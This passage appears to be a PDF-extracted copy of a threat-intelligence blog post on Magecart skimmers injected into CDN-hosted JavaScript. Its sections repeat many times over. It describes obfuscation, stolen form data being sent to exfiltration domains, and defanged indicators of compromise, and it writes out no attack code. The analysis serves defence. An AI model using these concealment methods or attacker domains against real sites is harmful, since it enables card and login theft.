many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 100 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 101 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 102 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 103 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 104 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 105 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 106 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 107 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 108 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 109 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 110 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 111 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 112 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 113 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 114 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 115 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 116 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 117 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 118 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 119 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 120 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 121 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 122 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 123 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 124 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 125 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 126 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 127 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 128 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 129 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 130 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 131 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be 